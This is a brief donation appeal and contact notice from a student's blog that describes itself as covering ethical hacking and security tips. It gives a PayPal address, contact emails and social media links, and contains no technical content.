Keep us strong Respected Readers :As a 18 years old student, running the top most blog in today's world is something quite difficult to do or handle as we bring the best things available related to ethical hacking and security tips to our readers every day. To keep us strong with this attitude, a small contribution from your side will highly be appreciated. Please donate us at my PayPal address- karan.chauhan75@gmail.com

Any Doubts are welcomed here Please contact me at my email- krackoworld@gmail.com for any kind of help or Doubts at any time. I will respond to it as soon as possible. You can also join our Forums at Here.

Thanks Find us on Facebook - Twitter

Warm Regards Karan Singh Chauhan